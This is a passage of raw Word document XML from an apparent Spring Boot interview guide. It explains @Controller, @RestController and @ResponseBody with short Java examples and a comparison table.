          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="599" w:name="_Toc197867813"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00F95AEE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between @Controller and @RestController</w:t>
      </w:r>
      <w:r w:rsidR="00D05936" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="599"/>
    </w:p>
    <w:p w14:paraId="2F40082B" w14:textId="53A5BF9B"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ifference between @Controller and @RestController in Spring lies in how they handle HTTP responses and the type of data they return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686173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ontroller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135584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It is used to define a Spring MVC controller that handles web requests and returns a view (typically JSP, Thymeleaf, or other templating engines).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168921B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xml:space="preserve">: By default, @Controller returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>view name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and Spring resolves the view using a view resolver. It can also return data using @ResponseBody if you want to return JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0507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traditional web applications that serve dynamic web pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BA1E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6FFB9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1B7CF4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23BE2814" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5114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21566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Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F954E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message", "Hello, World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3BA4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This will resolve to a view named 'hello.jsp' or 'hello.html'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DEF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459B8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6C7FD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stController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B70D6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xml:space="preserve">: It is a specialized version of @Controller that is used for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It combines @Controller and @ResponseBody annotations, meaning that methods in @RestController will automatically serialize return values to the response body (typically JSON or XML).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E31C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When you return data from a @RestController, it automatically returns the data in the response body (e.g., JSON or XML) without needing @ResponseBody explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA9A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REST APIs or web services that return data (JSON, XML) instead of views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B94D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7BA9E15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3662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RestController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E116A" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136ED7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E5D0B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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728118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  // This will be automatically serialized to JSON or plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B53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FF9A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D5531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4098"/>
        <w:gridCol w:w="3740"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="05BF4546" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EE0A7D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eature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B93B5D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB34DD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stController</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="72646D9C" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D1393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168CC1F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web applications with views</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F998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RESTful web services or APIs that return data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="3E9D3C40" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11CDDE4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ew Resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21D607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a view name to be resolved by a view resolver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF2C5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data directly (no view resolution)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="447DF93C" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="311D26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Body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466D73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you need to manually use @ResponseBody)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE8792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 (it automatically applies @ResponseBody)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="25EC552F" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FCF41B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Return Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D182D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a view (JSP, Thymeleaf)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63A0AB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ata (JSON, XML, plain text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="768CA0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0C0573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s used for web applications where you render views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F5D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xml:space="preserve"> is used for RESTful APIs that return data in response bodies, usually in formats like JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5472D786" w14:textId="650EE52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523" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BB9FE" w14:textId="476EE0DE" w:rsidR="00D05936" w:rsidRPr="00CE4B95" w:rsidRDefault="00A0576F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="600" w:name="_Toc197867814"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Responsebody annotation</w:t>
      </w:r>
      <w:r w:rsidR="00D05936" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="600"/>
    </w:p>
    <w:p w14:paraId="6EAF3712" w14:textId="1910EB7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0CA1EF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w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Typically used in controller methods to return raw data (like JSON or XML) directly to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7EF0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Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The return type is automatically serialized (using HttpMessageConverter) into the specified format, such as JSON or XML, based on the content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD0E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View Resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It prevents Spring from trying to resolve the return value as a view and directly writes the response to the HTTP response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C358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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922E5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ACCF0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43443986" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5F99B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D9867E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Body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD7F1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395D4A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4B051B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The User object will be automatically converted to JSON and returned in the response body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DC6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180BC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B9256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63DC3B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It is primarily used in REST APIs where you want to send data (e.g., JSON) in the response instead of returning a view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E58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Serialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring automatically serializes Java objects to the appropriate format based on the Content-Type header (e.g., JSON for application/json).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C60F9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In Combination with @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50A8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use @RestController on a class, the @ResponseBody behavior is applied to all methods in that class automatically, meaning you don't need to annotate each method with @ResponseBody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A4F9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with @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DCE95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DEF93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0AFA95DB" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A53A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6F2CE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BFB68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66E5A1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Automatically serialized to JSON, no need for @ResponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D4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9B672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8D05B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ResponseBody is used to return data directly in the HTTP response body, particularly useful in RESTful services for sending JSON, XML, or plain text responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFD6C4" w14:textId="232DEDD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524" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8306A8" w14:textId="7F084FE9" w:rsidR="00D05936" w:rsidRPr="00CE4B95" w:rsidRDefault="00E17679">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="601" w:name="_Toc197867815"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain @RestController annotation in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00D05936" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="601"/>
    </w:p>
    <w:p w14:paraId="17834CDA" w14:textId="76712EA2"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n Spring Boot is a specialized version of the @Controller annotation used to define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is part of the Spring Web module and is used to create </w:t>
      </w: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xml:space="preserve"> where methods return data (e.g., JSON, XML) instead of views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23280E0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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AE1F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Combination of @Controller and @ResponseBody:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D068A01"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RestController is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>composite annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that combines @Controller and @ResponseBody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE951B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JSON/XML Conversion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C51EA5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utomatically converts the return value of a method (usually a POJO or DTO) into JSON or XML based on the request's Accept header or the content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9770EF"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uses HttpMessageConverter to serialize and deserialize objects to/from JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D441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al for REST APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5A966"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4AEB4B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CEB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7743E032" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FCCE5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8469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4D2E5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  // Will be automatically converted to JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC78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486AF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93CBF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1A98EF8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getUser() method will return a User object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7829E6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tController ensures that the return value is automatically serialized to JSON and sent in the response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A69BE0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45AB202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mplification</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You don't need to add @ResponseBody to every method since it's implied by @RestController.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC5D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sistent for RESTful Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is specifically tailored for building REST APIs, which makes it a clear choice for service-oriented applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAACDB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 Serialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring handles serialization and deserialization of Java objects into JSON (or XML) automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3CAA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REST API Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A2B1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17108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284D45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3772836C" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F28A5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products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560C1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ist&lt;Product&gt; getAllProducts() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE30A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ist&lt;Product&gt; products = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1026C2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1, "Laptop", 1000));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0335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2, "Phone", 700));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2832EBD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  // Automatically converted to JSON and sent to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F25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93CE6E" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6319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products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E248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AF804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rocess the incoming product data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C10D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  // Return the created product, automatically converted to JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440A38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ECD54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625BA3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3064EA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 is a specialized controller in Spring Boot for handling REST API requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8BD8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ombines @Controller and @ResponseBody, automatically serializing return values to JSON or XML without the need for manual serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520BBDA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deal for creating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PIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that respond with data (rather than views).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B908523" w14:textId="3D273EC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525" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78397F70" w14:textId="1D049A7F" w:rsidR="00D05936" w:rsidRPr="00CE4B95" w:rsidRDefault="004A09A6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="602" w:name="_Toc197867816"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Which two annotations are used in built by @RestController</w:t>
      </w:r>
      <w:r w:rsidR="00D05936" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="602"/>
    </w:p>
    <w:p w14:paraId="25DF3817" w14:textId="5BA7CB89" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D0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s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>composed annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that combines the following two annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F779954"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p>
    <w:p w14:paraId="2A42169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the class as a Spring MVC controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469680F"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to define web layer classes (typically returning views).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC9F30D"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p>
    <w:p w14:paraId="507DE6E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dicates that the return value of the methods should be written directly to the HTTP response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09101A11"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matically converts the return object to JSON (or XML) using HttpMessageConverter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4B21A" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D0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o, @RestController = @Controller + @ResponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F16491"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means every method inside a class annotated with @RestController behaves as if it is annotated with @ResponseBody, which is ideal for REST APIs returning JSON/XML responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD29DA8" w14:textId="255FE01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526" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF3FF1" w14:textId="5AA4C59A" w:rsidR="00E215BE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E215BE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
